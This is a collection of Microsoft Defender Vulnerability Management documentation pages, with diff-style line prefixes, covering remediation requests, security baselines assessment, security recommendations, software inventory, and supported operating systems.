-> The same minimum requirements as Microsoft Defender for Endpoint apply to Microsoft Defender Vulnerability Management, for more information, see [Minimum requirements](../defender-endpoint/minimum-requirements.md).
-
-Ensure that your devices:
--- Are onboarded to Microsoft Defender for Endpoint Plan 2 or Microsoft Defender Vulnerability Management--- Run [supported operating systems and platforms](tvm-supported-os.md)--- Have the following mandatory updates installed and deployed in your network to boost your vulnerability assessment detection rates:-
- > Release | Security update KB number and link
- > :|:
- > Windows 10 Version 1709 | [KB4493441](https://support.microsoft.com/help/4493441/windows-10-update-kb4493441) and [KB 4516071](https://support.microsoft.com/help/4516071/windows-10-update-kb4516071)
- > Windows 10 Version 1803 | [KB4493464](https://support.microsoft.com/help/4493464) and [KB 4516045](https://support.microsoft.com/help/4516045/windows-10-update-kb4516045)
- > Windows 10 Version 1809 | [KB 4516077](https://support.microsoft.com/help/4516077/windows-10-update-kb4516077)
- > Windows 10 Version 1903 | [KB 4512941](https://support.microsoft.com/help/4512941/windows-10-update-kb4512941)
--- Are onboarded to [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) and [Microsoft Endpoint Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection-configure) to help remediate threats found by Microsoft Defender Vulnerability Management, formerly known as Threat & Vulnerability Management (TVM). If you're using Configuration Manager, update your console to the latest version.-
- > [!NOTE]
- > If you have the Intune connection enabled, you get an option to create an Intune security task when creating a remediation request. This option does not appear if the connection is not set.
--- Have at least one security recommendation that can be viewed in the device page--- Are tagged or marked as co-managed-
-## Data storage and privacy
-
-The same data security and privacy practices for Microsoft Defender for Endpoint apply to Microsoft Defender Vulnerability Management, for more information, see [Microsoft Defender for Endpoint data storage and privacy](../defender-endpoint/data-storage-privacy.md).
-
-## Relevant permission options
-
-> [!NOTE]
-> You can now control access and grant granular permissions for Microsoft Defender Vulnerability Management as part of the Microsoft Defender XDR Unified RBAC model. For more information, see [Microsoft Defender XDR Unified role-based access control (RBAC)](../defender/manage-rbac.md).
-
-To view the permissions options for vulnerability management:
-
-1. Log in to Microsoft Defender portal using account with a Security administrator or Global administrator role assigned.
-2. In the navigation pane, select **Settings > Endpoints > Roles**.
-
-For more information, see [Create and manage roles for role-based access control](../defender-endpoint/user-roles.md).
-
-### View data
--- **Security operations** - View all security operations data in the portal-- **Defender Vulnerability Management** - View Defender Vulnerability Management data in the portal-
-### Active remediation actions
--- **Security operations** - Take response actions, approve or dismiss pending remediation actions, manage allowed/blocked lists for automation and indicators-- **Defender Vulnerability Management - Exception handling** - Create new exceptions and manage active exceptions-- **Defender Vulnerability Management - Remediation handling** - Submit new remediation requests, create tickets, and manage existing remediation activities-- **Defender Vulnerability Management - Application handling** - Apply immediate mitigation actions by blocking vulnerable applications, as part of the remediation activity and manage the blocked apps and perform unblock actions-
-### Defender Vulnerability Management - security baselines
-
-**Defender Vulnerability Management ΓÇô Manage security baselines assessment profiles** - Create and manage profiles so you can assess if your devices comply to security industry baselines.
-
-## Related articles
--- [Supported operating systems and platforms](tvm-supported-os.md)-- [Microsoft Defender Vulnerability Management dashboard](tvm-dashboard-insights.md)
security Tvm Remediation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-remediation.md
- Title: Remediate vulnerabilities
-description: Remediate security weaknesses discovered through security recommendations, and create exceptions if needed, in defender vulnerability management.
-----
- - m365-security
- - Tier2
- Previously updated : 03/04/2022--
-# Remediate vulnerabilities
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-Watch this short video to learn how Microsoft Defender Vulnerability Management discovers vulnerabilities and misconfigurations on your endpoints and provides actionable insights that help you quickly remediate threats and vulnerabilities in your environment.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVs]
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Request remediation
-
-Vulnerability management capabilities bridges the gap between Security and IT administrators through the remediation request workflow. Security admins like you can request for the IT Administrator to remediate a vulnerability from the **Recommendation** pages to Intune.
-
-### Enable Microsoft Intune connection
-
-To use this capability, enable your Microsoft Intune connections. In the Microsoft Defender portal, navigate to **Settings** \> **Endpoints** \> **General** \> **Advanced features**. Scroll down and look for **Microsoft Intune connection**. By default, the toggle is turned off. Turn your **Microsoft Intune connection** toggle **On**.
-
-**Note**: If you have the Intune connection enabled, you get an option to create an Intune security task when creating a remediation request. This option doesn't appear if the connection isn't set.
-
-See [Use Intune to remediate vulnerabilities identified by Microsoft Defender for Endpoint](/intune/atp-manage-vulnerabilities) for details.
-
-### Remediation request steps
-
-1. Go to the **Vulnerability management** navigation menu in the Microsoft Defender portal, and select [**Recommendations**](tvm-security-recommendation.md).
-
-2. Select a security recommendation you would like to request remediation for, and then select **Remediation options**.
-
-3. Fill out the form, including what you are requesting remediation for, applicable device groups, priority, due date, and optional notes.
- 1. If you choose the "attention required" remediation option, selecting a due date won't be available since there's no specific action.
-
-4. Select **Submit request**. Submitting a remediation request creates a remediation activity item within vulnerability management, which can be used for monitoring the remediation progress for this recommendation. This won't trigger a remediation or apply any changes to devices.
-
-5. Notify your IT Administrator about the new request and have them log into Intune to approve or reject the request and start a package deployment.If you want to check how the ticket shows up in Intune, See [Use Intune to remediate vulnerabilities identified by Microsoft Defender for Endpoint](/mem/intune/protect/atp-manage-vulnerabilities) for details.
-
-6. Go to the [**Remediation**](tvm-remediation.md) page to view the status of your remediation request.
-
-> [!NOTE]
-> If your request involves remediating more than 10,000 devices, we can only send 10,000 devices for remediation to Intune.
-
-After your organization's cybersecurity weaknesses are identified and mapped to actionable [security recommendations](tvm-security-recommendation.md), start creating security tasks. You can create tasks through the integration with Microsoft Intune where remediation tickets are created.
-
-Lower your organization's exposure from vulnerabilities and increase your security configuration by remediating the security recommendations.
-
-## View your remediation activities
-
-When you submit a remediation request from the Security recommendations page, it kicks off a remediation activity. A security task is created that can be tracked on a **Remediation** page, and a remediation ticket is created in Microsoft Intune.
-
-If you chose the "attention required" remediation option, there will be no progress bar, ticket status, or due date since there's no actual action we can monitor.
-
-Once you are in the Remediation page, select the remediation activity that you want to view. You can follow the remediation steps, track progress, view the related recommendation, export to CSV, or mark as complete.
--
-> [!NOTE]
-> There is a 180 day retention period for completed remediation activities. To keep the Remediation page performing optimally, the remediation activity will be removed 6 months after its completion.
-
-### Completed by column
-
-Track who closed the remediation activity with the "Completed by" column on the Remediation page.
--- **Email address**: The email of the person who manually completed the task-- **System confirmation**: The task was automatically completed (all devices remediated)-- **N/A**: Information isn't available because we don't know how this older task was completed--
-### Top remediation activities in the dashboard
-
-View **Top remediation activities** in the [**Vulnerability management** dashboard](tvm-dashboard-insights.md). Select any of the entries to go to the **Remediation** page. You can mark the remediation activity as completed after the IT admin team remediates the task.
-
-![Example of Top remediation activities card with a table that lists top activities that were generated from security recommendations.](../../media/defender-vulnerability-management/tvm-remediation-activities-card.png)
-
-## Related articles
--- [Dashboard](tvm-dashboard-insights.md)-- [Security recommendations](tvm-security-recommendation.md)
security Tvm Security Baselines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-security-baselines.md
- Title: Security baselines assessment
-description: Find out about the security baselines in your environment
-----
- - m365-security
- - Tier1
- Previously updated : 03/01/2023--
-# Security baselines assessment
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-Instead of running never-ending compliance scans, security baselines assessment helps you to continuously and effortlessly monitor your organization's security baselines compliance and identify changes in real time.
-
-A security baseline profile is a customized profile that you can create to assess and monitor endpoints in your organization against industry security benchmarks. When you create a security baseline profile, you're creating a template that consists of multiple device configuration settings and a base benchmark to compare against.
-
-Security baselines provide support for Center for Internet Security (**CIS)** benchmarks for Windows 10, Windows 11, and Windows Server 2008 R2 and above, as well as Security Technical Implementation Guides (**STIG)** benchmarks for Windows 10 and Windows Server 2019.
-
-> [!NOTE]
-> The benchmarks currently only support Group Policy Object (GPO) configurations and not Microsoft Configuration Manager (Intune).
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Get started with security baselines assessment
-
-1. Go to **Vulnerability management** > **Baselines assessment** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Profiles** tab at the top, then select the **Create profile** button.
-3. Enter a name and description for your security baselines profile and select **Next**.
-4. On the **Baseline profile scope** page set the profile settings such as software, base benchmark (CIS or STIG), and the compliance level and select **Next**.
-5. Select the configurations you want to include in the profile.
-
- :::image type="content" source="../../media/defender-vulnerability-management/add_configuration_settings.png" alt-text="Screenshot of the add configuration settings page" lightbox="../../media/defender-vulnerability-management/add_configuration_settings.png":::
-
- Select **Customize** if you want to change the threshold configuration value for your organization.
-
- :::image type="content" source="../../media/defender-vulnerability-management/baselines_customize_configuration.png" alt-text="Screenshot of the customize configuration settings page" lightbox="../../media/defender-vulnerability-management/baselines_customize_configuration.png":::
-
-6. Select **Next** to choose the device groups and device tags you want to include in the baseline profile. The profile will be automatically applied to devices added to these groups in the future.
-7. Select **Next** to review the profile.
-8. Select **Submit** to create your profile.
-9. On the final page, select **View profile page** to see the assessment results.
-
-> [!NOTE]
-> You can create multiple profiles for the same operating system with various customizations.
-
- When you customize a configuration an icon will appear beside it to indicate that it has been customized and is no longer using the recommended value. Select the **reset** button to revert to the recommended value.
-
-Useful icons to be aware of:
-
-![Previously customized configuration](../../media/defender-vulnerability-management/previous_customization.png) - This configuration has been customized before. When creating a new profile if you select **Customize**, you'll see the available variations you can choose from.
-
-![Not using the default value](../../media/defender-vulnerability-management/customized_value.png) - This configuration has been customized and is not using the default value.
-
-## Security baselines assessment overview
-
-On the security baselines assessment overview page you can view device compliance, profile compliance, top failing devices and top misconfigured devices.
-
-## Review security baseline profile assessment results
-
-1. In the **Profiles** page, select any of your profiles to open a flyout with additional information.
-
- :::image type="content" source="../../media/defender-vulnerability-management/baseline_profile.png" alt-text="Screenshot of the baseline profile page" lightbox="../../media/defender-vulnerability-management/baseline_profile.png":::
-
-2. Select **Open profile page**. The profile page contains two tabs **Configurations** and **Devices**.
-
-### View by configuration
-
-In the **Configurations** tab, you can review the list of configurations and assess their reported compliance state.
--
-By selecting a configuration in the list, you'll see a flyout with details for the policy setting, including the recommended value (the expected value range for a device to be considered compliant) and the source used to determine the current device settings.
--
-The **Devices** tab shows a list of all applicable devices and their compliance state against this specific configuration. For each device, you can use the current value detected to see why it's compliant or non compliant.
-
- :::image type="content" source="../../media/defender-vulnerability-management/security-baselines-compliance.png" alt-text="Screenshot of the baseline compliance page" lightbox="../../media/defender-vulnerability-management/security-baselines-compliance.png":::
-
-### View by device
-
-In the main **Devices** tab, you can review the list of devices and assess their reported compliance state.
-
-By selecting a device in the list, you'll see a flyout with additional details.
--
-Select the **Configuration** tab to view the compliance of this specific device against all the profile configurations.
-
-At the top of the device side panel, select **Open device page** to go to the device page in the device inventory. The device page displays the **Baseline compliance** tab that provides granular visibility into the compliance of the device.
-
-By selecting a configuration in the list, you'll see a flyout with compliance details for the policy setting on this device.
-
-## Create and manage exceptions
-
-You may have cases where you don't want to assess specific configurations on certain devices. For example, a device could be under third party control or it could have an alternate mitigation already in place. In these situations, you can add exceptions to exclude the assessment of specific configurations on a device.
-
-Devices included in exceptions won't be assessed for the specified configurations in the baseline profiles. This means it won't affect an organization's metrics and score, and it can help provide organizations with a clearer view of their compliance.
-
-To view exceptions:
-
-1. Go to **Vulnerability management** > **Baselines assessment** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Exceptions** tab at the top
--
-To add a new exception:
-
-1. On the **Exceptions** tab select the **Create** button.
-2. Fill in the requested details, including the justification reason, and duration.
-
-3. Select **Next**.
-
-4. On the **Configuration scope** page choose the software, base benchmark, and the compliance level and select **Next**.
-5. Select the configurations you want to add to the exception.
-
- :::image type="content" source="../../media/defender-vulnerability-management/security-baselines-exceptions-configurations.png" alt-text="Screenshot of the configuration exceptions page" lightbox="../../media/defender-vulnerability-management/security-baselines-exceptions-configurations.png":::
-
-6. Select **Next** to choose the devices you want to include in the exception. The exception will be automatically applied to devices.
-7. Select **Next** to review the exception.
-8. Select **Submit** to create your exception.
-9. On the final page, select **View all exceptions** to return to the exceptions page.
-
-In the **Exceptions** page, select any of your exceptions to open a flyout pane where you can see the status, edit or delete your exception:
-
- :::image type="content" source="../../media/defender-vulnerability-management/security-baselines-exceptions-details.png" alt-text="Screenshot of the exceptions side details page" lightbox="../../media/defender-vulnerability-management/security-baselines-exceptions-details.png":::
-
-## Use advanced hunting
-
-You can run advanced hunting queries on the following tables to gain visibility on security baselines in your organization:
--- **DeviceBaselineComplianceProfiles**: provides details on created profiles.-- **DeviceBaselineComplianceAssessment**: device compliance related information.-- **DeviceBaselineComplianceAssessmentKB**: general settings for CIS and STIG benchmarks (not related to any device).-
-## Related articles
--- [Vulnerabilities in my organization](tvm-weaknesses.md)-- [Advanced hunting schema reference](../defender-endpoint/advanced-hunting-schema-reference.md)
security Tvm Security Recommendation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-security-recommendation.md
- Title: Security recommendations
-description: Get actionable security recommendations prioritized by threat, likelihood to be breached, and value, in vulnerability management.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Security recommendations
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-Cybersecurity weaknesses identified in your organization are mapped to actionable security recommendations and prioritized by their impact. Prioritized recommendations help shorten the time to mitigate or remediate vulnerabilities and drive compliance.
-
-Each security recommendation includes actionable remediation steps. To help with task management, the recommendation can also be sent using Microsoft Intune and Microsoft Endpoint Configuration Manager. When the threat landscape changes, the recommendation also changes as it continuously collects information from your environment.
-
-> [!TIP]
-> To get emails about new vulnerability events, see [Configure vulnerability email notifications in Microsoft Defender for Endpoint](../defender-endpoint/configure-vulnerability-email-notifications.md)
-
-## How it works
-
-Each device in the organization is scored based on three important factors to help customers to focus on the right things at the right time.
--- **Threat**: Characteristics of the vulnerabilities and exploits in your organizations' devices and breach history. Based on these factors, the security recommendations show the corresponding links to active alerts, ongoing threat campaigns, and their corresponding threat analytic reports.-- **Breach likelihood**: Your organization's security posture and resilience against threats.-- **Business value**: Your organization's assets, critical processes, and intellectual properties.-
-## Navigate to the Security recommendations page
-
-Access the Security recommendations page a few different ways:
--- Vulnerability management navigation menu in the Microsoft Defender portal-- Top security recommendations in the [vulnerability management dashboard](tvm-dashboard-insights.md)-
-### Navigation menu
-
-Go to the **Vulnerability management** navigation menu and select **Recommendations**. The page contains a list of security recommendations for the threats and vulnerabilities found in your organization.
-
-### Top security recommendations in the vulnerability management dashboard
-
-In a given day as a Security Administrator, you can take a look at the [vulnerability management dashboard](tvm-dashboard-insights.md) to see your [exposure score](tvm-exposure-score.md) side by side with your [Microsoft Secure Score for Devices](tvm-microsoft-secure-score-devices.md). The goal is to **lower** your organization's exposure from vulnerabilities, and **increase** your organization's device security to be more resilient against cybersecurity threat attacks. The top security recommendations list can help you achieve that goal.
--
-The top security recommendations list the improvement opportunities prioritized based on the important factors mentioned in the previous section - threat, likelihood to be breached, and value. Selecting a recommendation will take you to the security recommendations page with more details.
-
-## Security recommendations overview
-
-View recommendations, the number of weaknesses found, related components, threat insights, number of exposed devices, status, remediation type, remediation activities, impact to your exposure score and Secure Score for Devices once the recommendation is implemented, and associated tags.
-
-The color of the **Exposed devices** graph changes as the trend changes. If the number of exposed devices is on the rise, the color changes to red. If there's a decrease in the number of exposed devices, the color of the graph will change to green.
-
-> [!NOTE]
-> Vulnerability management shows devices that were in use up to **30 days** ago. This is different from the rest of Microsoft Defender for Endpoint, where if a device has not been in use for more than 7 days it has in an 'Inactive' status.
--
-### Icons
-
-Useful icons also quickly call your attention to:
--- ![arrow hitting a target.](../../media/defender-vulnerability-management/tvm_alert_icon.png) possible active alerts-- ![red bug.](../../media/defender-vulnerability-management/tvm_bug_icon.png) associated public exploits-- ![light bulb.](../../media/defender-vulnerability-management/tvm_insight_icon.png) recommendation insights-
-### Impact
-
-The impact column shows the potential impact on your exposure score and Secure Score for Devices once a recommendation is implemented. You should prioritize items that will lower your exposure score and raise your Secure Score for Devices.
--- The potential reduction in your exposure score is displayed as: :::image type="icon" source="../../media/defender-vulnerability-management/reduce-exposure-score.png" border="false":::. A lower exposure score means devices are less vulnerable to exploitation. Since the exposure score is based on a combination of factors, including new remediations or newly discovered vulnerabilities, the actual score reduction may be lower.--- The projected increase to your Secure Score for Devices is displayed as: :::image type="icon" source="../../media/defender-vulnerability-management/increase-secure-score.png" border="false":::. A higher Secure Score for Devices means your endpoints are more resilient against cybersecurity attacks.-
-### Explore security recommendation options
-
-Select the security recommendation that you want to investigate or process.
--
-From the flyout, you can choose any of the following options:
--- **Open software page** - Open the software page to get more context on the software and how it's distributed. The information can include threat context, associated recommendations, weaknesses discovered, number of exposed devices, discovered vulnerabilities, names and detailed of devices with the software installed, and version distribution.--- [**Remediation options**](tvm-remediation.md) - Submit a remediation request to open a ticket in Microsoft Intune for your IT administrator to pick up and address. Track the remediation activity in the Remediation page.--- [**Exception options**](tvm-exception.md) - Submit an exception, provide justification, and set exception duration if you can't remediate the issue yet.-
-> [!NOTE]
-> When a software change is made on a device, it typically takes 2 hours for the data to be reflected in the security portal. However, it may sometimes take longer. Configuration changes can take anywhere from 4 to 24 hours.
-
-### Investigate changes in device exposure or impact
-
-If there is a large jump in the number of exposed devices, or a sharp increase in the impact on your organization exposure score and Secure Score for Devices, then that security recommendation is worth investigating.
-
-1. Select the recommendation and **Open software page**
-2. Select the **Event timeline** tab to view all the impactful events related to that software, such as new vulnerabilities or new public exploits. [Learn more about event timeline](threat-and-vuln-mgt-event-timeline.md)
-3. Decide how to address the increase or your organization's exposure, such as submitting a remediation request
-
-### Recommendations on devices
-
-To see the list of security recommendations that apply to a device you can:
-
-1. Select the device from the **Exposed devices** tab in the recommendation flyout panel or select the device directly from the **Device inventory** page.
-2. Select the **Security recommendations** tab to see a list of security recommendations for this device.
-
- :::image type="content" source="../../media/defender-vulnerability-management/security-recommendation-devicepage.png" alt-text="Screenshot of the certificate inventory page" lightbox="../../media/defender-vulnerability-management/security-recommendation-devicepage.png":::
-
-> [!NOTE]
-> If you have the [Microsoft Defender for IoT](/azure/defender-for-iot/organizations/concept-enterprise/) integration enabled in Defender for Endpoint, recommendations for Enterprise IoT devices that appear on IoT devices tab will appear on the security recommendations page. For more information, see [Enable Enterprise IoT security with Defender for Endpoint](/azure/defender-for-iot/organizations/eiot-defender-for-endpoint/).
-
-## Request remediation
-
-The vulnerability management remediation capability bridges the gap between Security and IT administrators through the remediation request workflow. Security admins like you can request for the IT Administrator to remediate a vulnerability from the **Security recommendation** page to Intune. [Learn more about remediation options](tvm-remediation.md)
-
-### How to request remediation
-
-Select a security recommendation you would like to request remediation for, and then select **Remediation options**. Fill out the form and select **Submit request**. Go to the [**Remediation**](tvm-remediation.md) page to view the status of your remediation request. [Learn more about how to request remediation](tvm-remediation.md#request-remediation)
-
-## File for exception
-
-As an alternative to a remediation request when a recommendation is not relevant at the moment, you can create exceptions for recommendations. [Learn more about exceptions](tvm-exception.md)
-
-Only users with "exceptions handling" permissions can add exception. [Learn more about RBAC roles](../defender-endpoint/user-roles.md).
-
-When an exception is created for a recommendation, the recommendation is no longer active. The recommendation state will change to **Full exception** or **Partial exception** (by device group).
-
-### How to create an exception
-
-Select a security recommendation you would like to create an exception for, and then select **Exception options**.
-
-![Showing where the button for "exception options" is location in a security recommendation flyout.](../../media/defender-vulnerability-management/tvm-exception-options.png)
-
-Fill out the form and submit. To view all your exceptions (current and past), navigate to the [Remediation](tvm-remediation.md) page under the **Threat & Vulnerability Management** menu and select the **Exceptions** tab. [Learn more about how to create an exception](tvm-exception.md#create-an-exception)
-
-## Report inaccuracy
-
-You can report a false positive when you see any vague, inaccurate, incomplete, or already remediated security recommendation information.
-
-1. Open the Security recommendation.
-
-2. Select the three dots beside the security recommendation that you want to report, then select **Report inaccuracy**.
-
-3. From the flyout pane, select the inaccuracy category from the drop-down menu, fill in your email address, and details regarding the inaccuracy.
-
-4. Select **Submit**. Your feedback is immediately sent to the vulnerability management experts.
-
-## Related articles
--- [Dashboard](tvm-dashboard-insights.md)-- [Exposure score](tvm-exposure-score.md)-- [Microsoft Secure Score for Devices](tvm-microsoft-secure-score-devices.md)-- [Remediate vulnerabilities](tvm-remediation.md)-- [Create and view exceptions for security recommendations](tvm-exception.md)-- [Event timeline](threat-and-vuln-mgt-event-timeline.md)
security Tvm Software Inventory https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-software-inventory.md
- Title: Software inventory
-description: The software inventory page for Microsoft Defender for Endpoint's Vulnerability Management shows how many weaknesses and vulnerabilities have been detected in software.
-----
- - m365-security
- - Tier1
- Previously updated : 03/01/2023--
-# Software inventory
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan) -
-The software inventory in Defender Vulnerability Management is a list of known software in your organization. The default filter on the software inventory page displays all software with official [Common Platform Enumerations (CPE)](https://nvd.nist.gov/products/cpe). The view includes details such as the name of the vendor, number of weaknesses, threats, and number of exposed devices.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-You can remove the **CPE Available** filter, to gain further visibility and increase your search scope across all installed software in your organization. This means all software, including software without a CPE, will now display in the software inventory list.
-
-> [!NOTE]
-> As CPEs are used by vulnerability management to identify the software and any vulnerabilities, even though software products without a CPE will be shown in the software inventory page, they will not be supported by vulnerability management and information like, exploits, number of exposed devices, and weaknesses won't be available for them.
-
-## How it works
-
-In the field of discovery, we're leveraging the same set of signals that is responsible for detection and vulnerability assessment in [Microsoft Defender for Endpoint detection and response capabilities](../defender-endpoint/overview-endpoint-detection-response.md).
-
-Since it's real time, in a matter of minutes, you'll see vulnerability information as they get discovered. The engine automatically grabs information from multiple security feeds. In fact, you'll see if a particular software is connected to a live threat campaign. It also provides a link to a Threat Analytics report soon as it's available.
-
-## Navigate to the Software inventory page
-
-Access the software inventory page by selecting **Software inventory** from the Vulnerability management navigation menu in the [Microsoft Defender portal](../defender/microsoft-365-security-center-mde.md).
-
-> [!NOTE]
-> If you search for software using the Microsoft Defender for Endpoint global search, make sure to put an underscore instead of a space. For example, for the best search results you'd write "windows_10" or "windows_11" instead of "Windows 10" or "Windows 11".
-
-## Software inventory overview
-
-The **Software inventory** page opens with a list of software installed in your network, including the vendor name, weaknesses found, threats associated with them, exposed devices, impact to exposure score, and tags.
-
-The data is updated every three to four hours. There is currently no way to force a sync.
-
-By default, the view is filtered by **Product Code (CPE): Available**. You can also filter the list view based on weaknesses found in the software, threats associated with them, and tags like whether the software has reached end-of-support.
--
-Select the software that you want to investigate. A flyout panel will open with a more compact view of the information on the page. You can either dive deeper into the investigation and select **Open software page**, or flag any technical inconsistencies by selecting **Report inaccuracy**.
-
-### Software that isn't supported
-
-Software that isn't currently supported by vulnerability management may be present in the software inventory page. Because it is not supported, only limited data will be available. Filter by unsupported software with the "Not available" option in the "Weakness" section.
--
-The following indicates that software is not supported:
--- Weaknesses field shows "Not available"-- Exposed devices field shows a dash-- Informational text added in side panel and in software page-- The software page won't have the security recommendations, discovered vulnerabilities, or event timeline sections-
-## Software inventory on devices
-
-From the Microsoft Defender portal navigation panel, go to the **[Device inventory](../defender-endpoint/machines-view-overview.md)**. Select the name of a device to open the device page (like Computer1), then select the **Software inventory** tab to see a list of all the known software present on the device. Select a specific software entry to open the flyout with more information.
-
-Software may be visible at the device level even if it's currently not supported by vulnerability management. However, only limited data will be available. You'll know if software is unsupported because it will say "Not available" in the "Weakness" column.
-
-Software with no CPE can also show up under this device-specific software inventory.
-
-### Software evidence
-
-See evidence of where we detected a specific software on a device from the registry, disk, or both. You can find it on any device in the device software inventory.
-
-Select a software name to open the flyout, and look for the section called "Software Evidence."
--
-## Software pages
-
-You can view software pages a few different ways:
--- Software inventory page > Select a software name > Select **Open software page** in the flyout-- [Security recommendations page](tvm-security-recommendation.md) > Select a recommendation > Select **Open software page** in the flyout-- [Event timeline page](threat-and-vuln-mgt-event-timeline.md) > Select an event > Select the hyperlinked software name (like Visual Studio 2017) in the section called "Related component" in the flyout-
- A full page will appear with all the details of a specific software and the following information:
--- Side panel with vendor information, prevalence of the software in the organization (including number of devices it's installed on, and exposed devices that aren't patched), whether and exploit is available, and impact to exposure score.-- Data visualizations showing the number of, and severity of, vulnerabilities and misconfigurations. Also, graphs with the number of exposed devices.-- Tabs showing information such as:
- - Corresponding security recommendations for the weaknesses and vulnerabilities identified.
- - Named CVEs of discovered vulnerabilities.
- - Devices that have the software installed (along with device name, domain, OS, and more).
- - Software version list (including number of devices the version is installed on, the number of discovered vulnerabilities, and the names of the installed devices).
-
- :::image type="content" alt-text="Software example page for Visual Studio 2017 with the software details, weaknesses, exposed devices, and more." source="../../media/defender-vulnerability-management/tvm-software-page-example.png" lightbox="../../media/defender-vulnerability-management/tvm-software-page-example.png":::
-
-## Report inaccuracy
-
-Report an inaccuracy when you see vulnerability information and assessment results that are incorrect.
-
-1. Open the software flyout on the Software inventory page.
-2. Select **Report inaccuracy**.
-3. From the flyout pane, choose an issue to report from:
-
- - a software detail is wrong
- - the software is not installed on any device in my org
- - the number of installed or exposed devices is wrong
-
-4. Fill in the requested details about the inaccuracy. This will vary depending on the issue you're reporting.
-
-![Report inaccuracy](../../media/defender-vulnerability-management/report-inaccuracy-software.png)
-
-5. Select **Submit**. Your feedback is immediately sent to the vulnerability management experts.
-
-### Software inventory APIs
-
-You can use APIs to view information on the software installed in your organization. The information returned by the APIs includes the devices it's installed on, software name, software vendor, installed versions, and number of weaknesses. For more information, see:
--- [Export software inventory assessment per device](../defender-endpoint/get-assessment-software-inventory.md)-- [Export software vulnerabilities assessment per device](../defender-endpoint/get-assessment-software-vulnerabilities.md)-- [Export non product code software inventory assessment per device](../defender-endpoint/get-assessment-non-cpe-software-inventory.md)-
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Event timeline](threat-and-vuln-mgt-event-timeline.md)-- [View and organize the Microsoft Defender for Endpoint Devices list](../defender-endpoint/machines-view-overview.md)
security Tvm Supported Os https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-supported-os.md
- Title: Supported operating systems platforms and capabilities
-description: Ensure that you meet the operating system or platform requisites for Microsoft Defender Vulnerability Management, so the activities in your all devices are properly accounted for.
-----
- - m365-security
- - Tier2
- Previously updated : 03/04/2022--
-# Supported operating systems, platforms and capabilities
-
-Before you begin, ensure that you meet the following operating system or platform requisites for vulnerability management so the activities in your devices are properly accounted for.
-
-> [!NOTE]
-> The supported systems and platforms for vulnerability management may be different from the [Minimum requirements for Microsoft Defender for Endpoint](../defender-endpoint/minimum-requirements.md) list.
-
-## Capabilities per supported operating systems (OS) and platforms
-
-In the following table, "Yes" indicates that a vulnerability management capability is supported for the OS or platform on that row.
-
-Supported OS or platform|OS vulnerabilities|Software product vulnerabilities|OS configuration assessment|Security controls configuration assessment|Software product configuration assessment
-:|:|:|:|:|:
-Windows 7|Yes|Not supported|Not supported|Not supported|Not supported
-Windows 8.1|Yes|Yes|Yes|Yes|Yes
-Windows 10, versions 1607-1703|Yes|Not supported|Not supported|Not supported|Not supported
-Windows 10, version 1709 or later|Yes|Yes|Yes|Yes|Yes
-Windows 11|Yes|Yes|Yes|Yes|Yes
-Windows Server 2008 R2|Yes|Yes|Yes|Yes|Yes
-Windows Server 2012 R2|Yes|Yes|Yes|Yes|Yes
-Windows Server 2016|Yes|Yes|Yes|Yes|Yes
-Windows Server 2019|Yes|Yes|Yes|Yes|Yes
-Windows Server 2022|Yes|Yes|Yes|Yes|Yes
-macOS 10.14 "Mojave" and above|Yes|Yes|Yes|Yes|Yes
